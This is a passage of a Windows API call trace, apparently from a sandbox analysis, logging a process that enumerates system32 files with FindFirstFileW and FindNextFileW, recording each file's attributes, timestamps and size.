ftLastAccessTime.dwLowDateTime=0x92c3856c, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x92c5e6cc, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x48400, dwReserved0=0x0, dwReserved1=0x0, cFileName="apphelp.dll", cAlternateFileName="")) returned 1 [0030.652] lstrlenW (lpString="apphelp.dll") returned 11 [0030.652] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x98) returned 0x707510 [0030.652] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a4c40da, ftCreationTime.dwHighDateTime=0x1ca0410, ftLastAccessTime.dwLowDateTime=0x7a4c40da, ftLastAccessTime.dwHighDateTime=0x1ca0410, ftLastWriteTime.dwLowDateTime=0x7e595a10, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x7400, dwReserved0=0x0, dwReserved1=0x0, cFileName="Apphlpdm.dll", cAlternateFileName="")) returned 1 [0030.652] lstrlenW (lpString="Apphlpdm.dll") returned 12 [0030.652] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9a) returned 0x7075b0 [0030.652] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc6b7842, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0xcc6b7842, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x7e608600, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xc600, dwReserved0=0x0, dwReserved1=0x0, cFileName="appidapi.dll", cAlternateFileName="")) returned 1 [0030.652] lstrlenW (lpString="appidapi.dll") returned 12 [0030.653] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9a) returned 0x707658 [0030.653] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd29cc968, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0xd29cc968, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x7e6540f0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x31a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppIdPolicyEngineApi.dll", cAlternateFileName="")) returned 1 [0030.653] lstrlenW (lpString="AppIdPolicyEngineApi.dll") returned 24 [0030.653] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb2) returned 0x707700 [0030.653] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98006f9, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x98006f9, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x7e6c6ce0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x24800, dwReserved0=0x0, dwReserved1=0x0, cFileName="appmgmts.dll", cAlternateFileName="")) returned 1 [0030.653] lstrlenW (lpString="appmgmts.dll") returned 12 [0030.653] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9a) returned 0x7077c0 [0030.653] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1c14fdd, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb1c14fdd, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb1c6129e, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x53000, dwReserved0=0x0, dwReserved1=0x0, cFileName="appmgr.dll", cAlternateFileName="")) returned 1 [0030.653] lstrlenW (lpString="appmgr.dll") returned 10 [0030.653] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x96) returned 0x707868 [0030.653] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f6f58ca, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8f6f58ca, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8f6f58ca, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x9e800, dwReserved0=0x0, dwReserved1=0x0, cFileName="appwiz.cpl", cAlternateFileName="")) returned 1 [0030.653] lstrlenW (lpString="appwiz.cpl") returned 10 [0030.653] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc81f8794, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xc81f8794, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x7e6eb6d0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x30e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="apss.dll", cAlternateFileName="")) returned 1 [0030.653] lstrlenW (lpString="apss.dll") returned 8 [0030.653] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x92) returned 0x707920 [0030.654] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3986c, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x248a328, ftLastAccessTime.dwHighDateTime=0x1ca0432, ftLastWriteTime.dwLowDateTime=0x248a328, ftLastWriteTime.dwHighDateTime=0x1ca0432, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ar-SA", cAlternateFileName="")) returned 1 [0030.654] lstrlenW (lpString="ar-SA") returned 5 [0030.654] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x250) returned 0x709908 [0030.654] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\ar-SA\\*", lpFindFileData=0x709908 | out: lpFindFileData=0x709908*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3986c, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x248a328, ftLastAccessTime.dwHighDateTime=0x1ca0432, ftLastWriteTime.dwLowDateTime=0x248a328, ftLastWriteTime.dwHighDateTime=0x1ca0432, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x701c40 [0030.655] FindNextFileW (in: hFindFile=0x701c40, lpFindFileData=0x709908 | out: lpFindFileData=0x709908*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3986c, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x248a328, ftLastAccessTime.dwHighDateTime=0x1ca0432, ftLastWriteTime.dwLowDateTime=0x248a328, ftLastWriteTime.dwHighDateTime=0x1ca0432, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0030.655] FindNextFileW (in: hFindFile=0x701c40, lpFindFileData=0x709908 | out: lpFindFileData=0x709908*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd2e2f2c, ftCreationTime.dwHighDateTime=0x1ca041d, ftLastAccessTime.dwLowDateTime=0xcd70d590, ftLastAccessTime.dwHighDateTime=0x1ca041d, ftLastWriteTime.dwLowDateTime=0xcd70d590, ftLastWriteTime.dwHighDateTime=0x1ca041d, nFileSizeHigh=0x0, nFileSizeLow=0xb800, dwReserved0=0x0, dwReserved1=0x0, cFileName="cdosys.dll.mui", cAlternateFileName="")) returned 1 [0030.656] lstrlenW (lpString="cdosys.dll.mui") returned 14 [0030.656] FindNextFileW (in: hFindFile=0x701c40, lpFindFileData=0x709908 | out: lpFindFileData=0x709908*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd8641e7, ftCreationTime.dwHighDateTime=0x1ca041d, ftLastAccessTime.dwLowDateTime=0xcdbaa011, ftLastAccessTime.dwHighDateTime=0x1ca041d, ftLastWriteTime.dwLowDateTime=0xcdbaa011, ftLastWriteTime.dwHighDateTime=0x1ca041d, nFileSizeHigh=0x0, nFileSizeLow=0x1600, dwReserved0=0x0, dwReserved1=0x0, cFileName="comctl32.dll.mui", cAlternateFileName="")) returned 1 [0030.656] lstrlenW (lpString="comctl32.dll.mui") returned 16 [0030.656] FindNextFileW (in: hFindFile=0x701c40, lpFindFileData=0x709908 | out: lpFindFileData=0x709908*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc973a95d, ftCreationTime.dwHighDateTime=0x1ca041d, ftLastAccessTime.dwLowDateTime=0xca5a8e5c, ftLastAccessTime.dwHighDateTime=0x1ca041d, ftLastWriteTime.dwLowDateTime=0xca5a8e5c, ftLastWriteTime.dwHighDateTime=0x1ca041d, nFileSizeHigh=0x0, nFileSizeLow=0xc600, dwReserved0=0x0, dwReserved1=0x0, cFileName="comdlg32.dll.mui", cAlternateFileName="")) returned 1 [0030.656] lstrlenW (lpString="comdlg32.dll.mui") returned 16 [0030.656] FindNextFileW (in: hFindFile=0x701c40, lpFindFileData=0x709908 | out: lpFindFileData=0x709908*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc24606e1, ftCreationTime.dwHighDateTime=0x1ca041d, ftLastAccessTime.dwLowDateTime=0xc29bb83d, ftLastAccessTime.dwHighDateTime=0x1ca041d, ftLastWriteTime.dwLowDateTime=0xc29e199c, ftLastWriteTime.dwHighDateTime=0x1ca041d, nFileSizeHigh=0x0, nFileSizeLow=0x2c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="fms.dll.mui", cAlternateFileName="")) returned 1 [0030.656] lstrlenW (lpString="fms.dll.mui") returned 11 [0030.656] FindNextFileW (in: hFindFile=0x701c40, lpFindFileData=0x709908 | out: lpFindFileData=0x709908*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6374c39, ftCreationTime.dwHighDateTime=0x1ca041d, ftLastAccessTime.dwLowDateTime=0xc672ce80, ftLastAccessTime.dwHighDateTime=0x1ca041d, ftLastWriteTime.dwLowDateTime=0xc672ce80, ftLastWriteTime.dwHighDateTime=0x1ca041d, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x0, cFileName="mlang.dll.mui", cAlternateFileName="")) returned 1 [0030.656] lstrlenW (lpString="mlang.dll.mui") returned 13 [0030.656] FindNextFileW (in: hFindFile=0x701c40, lpFindFileData=0x709908 | out: lpFindFileData=0x709908*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc578de89, ftCreationTime.dwHighDateTime=0x1ca041d, ftLastAccessTime.dwLowDateTime=0xc5ce8fe5, ftLastAccessTime.dwHighDateTime=0x1ca041d, ftLastWriteTime.dwLowDateTime=0xc5ce8fe5, ftLastWriteTime.dwHighDateTime=0x1ca041d, nFileSizeHigh=0x0, nFileSizeLow=0x11400, dwReserved0=0x0, dwReserved1=0x0, cFileName="msimsg.dll.mui", cAlternateFileName="")) returned 1 [0030.656] lstrlenW (lpString="msimsg.dll.mui") returned 14 [0030.656] FindNextFileW (in: hFindFile=0x701c40, lpFindFileData=0x709908 | out: lpFindFileData=0x709908*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c657b4, ftCreationTime.dwHighDateTime=0x1ca041d, ftLastAccessTime.dwLowDateTime=0xc4f5f320, ftLastAccessTime.dwHighDateTime=0x1ca041d, ftLastWriteTime.dwLowDateTime=0xc4f5f320, ftLastWriteTime.dwHighDateTime=0x1ca041d, nFileSizeHigh=0x0, nFileSizeLow=0x1200, dwReserved0=0x0, dwReserved1=0x0, cFileName="msprivs.dll.mui", cAlternateFileName="")) returned 1 [0030.656] lstrlenW (lpString="msprivs.dll.mui") returned 15 [0030.656] FindNextFileW (in: hFindFile=0x701c40, lpFindFileData=0x709908 | out: lpFindFileData=0x709908*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c657b4, ftCreationTime.dwHighDateTime=0x1ca041d, ftLastAccessTime.dwLowDateTime=0xc4f5f320, ftLastAccessTime.dwHighDateTime=0x1ca041d, ftLastWriteTime.dwLowDateTime=0xc4f5f320, ftLastWriteTime.dwHighDateTime=0x1ca041d, nFileSizeHigh=0x0, nFileSizeLow=0x1200, dwReserved0=0x0, dwReserved1=0x0, cFileName="msprivs.dll.mui", cAlternateFileName="")) returned 0 [0030.656] FindClose (in: hFindFile=0x701c40 | out: hFindFile=0x701c40) returned 1 [0030.657] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709908 | out: hHeap=0x6d0000) returned 1 [0030.657] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5bf02cff, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0x5bf02cff, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x656df510, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x5200, dwReserved0=0x0, dwReserved1=0x0, cFileName="ARP.EXE", cAlternateFileName="")) returned 1 [0030.657] lstrlenW (lpString="ARP.EXE") returned 7 [0030.657] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x709908 [0030.657] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31c9efbc, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0x31c9efbc, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0xf2a6d430, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0x0, dwReserved1=0x0, cFileName="asferror.dll", cAlternateFileName="")) returned 1 [0030.657] lstrlenW (lpString="asferror.dll") returned 12 [0030.657] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9a) returned 0x7099a0 [0030.657] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef914800, ftCreationTime.dwHighDateTime=0x1d0aa91, ftLastAccessTime.dwLowDateTime=0x57090500, ftLastAccessTime.dwHighDateTime=0x1d2e676, ftLastWriteTime.dwLowDateTime=0xef914800, ftLastWriteTime.dwHighDateTime=0x1d0aa91, nFileSizeHigh=0x0, nFileSizeLow=0x6cc0, dwReserved0=0x0, dwReserved1=0x0, cFileName="aspnet_counters.dll", cAlternateFileName="ASPNET~1.DLL")) returned 1 [0030.657] lstrlenW (lpString="aspnet_counters.dll") returned 19 [0030.657] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa8) returned 0x709a48 [0030.658] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84e661b3, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x84e661b3, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x84e661b3, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x10800, dwReserved0=0x0, dwReserved1=0x0, cFileName="asycfilt.dll", cAlternateFileName="")) returned 1 [0030.658] lstrlenW (lpString="asycfilt.dll") returned 12 [0030.658] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9a) returned 0x709af8 [0030.658] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9839a69, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0xe9839a69, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x658ceec0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x5e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="at.exe", cAlternateFileName="")) returned 1 [0030.658] lstrlenW (lpString="at.exe") returned 6 [0030.658] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8e) returned 0x709ba0 [0030.658] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaedcb3c, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xfaedcb3c, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x658f38b0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x7200, dwReserved0=0x0, dwReserved1=0x0, cFileName="AtBroker.exe", cAlternateFileName="")) returned 1 [0030.658] lstrlenW (lpString="AtBroker.exe") returned 12 [0030.658] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9a) returned 0x709c38 [0030.658] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d2b74b, ftCreationTime.dwHighDateTime=0x1ca0418, ftLastAccessTime.dwLowDateTime=0x2d2b74b, ftLastAccessTime.dwHighDateTime=0x1ca0418, ftLastWriteTime.dwLowDateTime=0x805466c0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x0, dwReserved1=0x0, cFileName="atl.dll", cAlternateFileName="")) returned 1 [0030.658] lstrlenW (lpString="atl.dll") returned 7 [0030.658] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x709ce0 [0030.658] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b0b4600, ftCreationTime.dwHighDateTime=0x1cc2787, ftLastAccessTime.dwLowDateTime=0xcc438260, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0x4b0b4600, ftLastWriteTime.dwHighDateTime=0x1cc2787, nFileSizeHigh=0x0, nFileSizeLow=0x21b48, dwReserved0=0x0, dwReserved1=0x0, cFileName="atl100.dll", cAlternateFileName="")) returned 1 [0030.658] lstrlenW (lpString="atl100.dll") returned 10 [0030.659] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x96) returned 0x7079c0 [0030.659] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29b8ce00, ftCreationTime.dwHighDateTime=0x1ce64f7, ftLastAccessTime.dwLowDateTime=0xef797c80, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0x29b8ce00, ftLastWriteTime.dwHighDateTime=0x1ce64f7, nFileSizeHigh=0x0, nFileSizeLow=0x28248, dwReserved0=0x0, dwReserved1=0x0, cFileName="atl110.dll", cAlternateFileName="")) returned 1 [0030.659] lstrlenW (lpString="atl110.dll") returned 10 [0030.659] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x96) returned 0x707a60 [0030.659] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9363019e, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9363019e, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x936562fe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x47e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="atmfd.dll", cAlternateFileName="")) returned 1 [0030.659] lstrlenW (lpString="atmfd.dll") returned 9 [0030.659] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x94) returned 0x707b00 [0030.659] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9360a03e, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9360a03e, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9363019e, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x8600, dwReserved0=0x0, dwReserved1=0x0, cFileName="atmlib.dll", cAlternateFileName="")) returned 1 [0030.659] lstrlenW (lpString="atmlib.dll") returned 10 [0030.659] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x96) returned 0x707ba0 [0030.659] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf3c4130, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0xbf3c4130, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0x658f38b0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x0, cFileName="attrib.exe", cAlternateFileName="")) returned 1 [0030.659] lstrlenW (lpString="attrib.exe") returned 10 [0030.659] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x96) returned 0x707c40 [0030.659] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4204ec3, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb4204ec3, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb4204ec3, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x3b800, dwReserved0=0x0, dwReserved1=0x0, cFileName="audiodev.dll", cAlternateFileName="")) returned 1 [0030.659] lstrlenW (lpString="audiodev.dll") returned 12 [0030.659] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9a) returned 0x709d90 [0030.659] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78f79a81, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x78f79a81, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x80675280, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x5b800, dwReserved0=0x0, dwReserved1=0x0, cFileName="AudioEng.dll", cAlternateFileName="")) returned 1 [0030.659] lstrlenW (lpString="AudioEng.dll") returned 12 [0030.660] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9a) returned 0x709e38 [0030.660] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce47270e, ftCreationTime.dwHighDateTime=0x1ca041b, ftLastAccessTime.dwLowDateTime=0xce47270e, ftLastAccessTime.dwHighDateTime=0x1ca041b, ftLastWriteTime.dwLowDateTime=0xad59f9a0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x6c200, dwReserved0=0x0, dwReserved1=0x0, cFileName="AUDIOKSE.dll", cAlternateFileName="")) returned 1 [0030.660] lstrlenW (lpString="AUDIOKSE.dll") returned 12 [0030.660] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9a) returned 0x709ee0 [0030.660] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87266eb6, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x87266eb6, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x87266eb6, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2fc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="AudioSes.dll", cAlternateFileName="")) returned 1 [0030.660] lstrlenW (lpString="AudioSes.dll") returned 12 [0030.660] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9a) returned 0x709f88 [0030.660] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68ceb7bb, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0x68ceb7bb, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x80733960, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x35000, dwReserved0=0x0, dwReserved1=0x0, cFileName="AuditNativeSnapIn.dll", cAlternateFileName="")) returned 1 [0030.660] lstrlenW (lpString="AuditNativeSnapIn.dll") returned 21 [0030.660] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xac) returned 0x70bd78 [0030.660] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x735a0a8d, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0x735a0a8d, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x65a00190, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xc400, dwReserved0=0x0, dwReserved1=0x0, cFileName="auditpol.exe", cAlternateFileName="")) returned 1 [0030.660] lstrlenW (lpString="auditpol.exe") returned 12 [0030.660] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9a) returned 0x70a030 [0030.660] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a1010d4, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0x6a1010d4, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x80733960, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xd800, dwReserved0=0x0, dwReserved1=0x0, cFileName="AuditPolicyGPInterop.dll", cAlternateFileName="")) returned 1 [0030.660] lstrlenW (lpString="AuditPolicyGPInterop.dll") returned 24 [0030.660] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb2) returned 0x70be30 [0030.660] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6732ea88, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0x6732ea88, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0xf6ab4570, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0x17400, dwReserved0=0x0, dwReserved1=0x0, cFileName="auditpolmsg.dll", cAlternateFileName="")) returned 1 [0030.660] lstrlenW (lpString="auditpolmsg.dll") returned 15 [0030.661] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x70a0d8 [0030.661] FindNextFileW (in: hFindFile=0x6fed78, 